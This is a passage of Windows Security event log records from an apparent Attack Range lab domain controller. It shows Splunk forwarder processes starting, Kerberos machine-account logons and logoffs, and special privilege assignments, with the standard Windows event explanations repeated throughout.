Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263603
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd30
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263605
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xb94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263604
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x17e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:14:16 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263606
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x72BE2C
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263609
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73074D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263608
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x73074D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59881
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:14:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263607
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x73074D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:15:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263610
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xd00
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263612
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263611
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xad0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263613
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe18
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263614
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1b64
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263616
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x27c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263615
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xae0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263619
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7341BA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263618
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7341BA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59895
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:15:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263617
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7341BA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:16:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263621
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a50
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263620
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x106c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263622
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1494
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263623
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1894
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:16:11 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263624
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x735C99
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {DC6104D6-8644-C624-5E2A-37E68DB9CAB8}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.15
Source Port: 52955
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:16:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263625
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4a0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
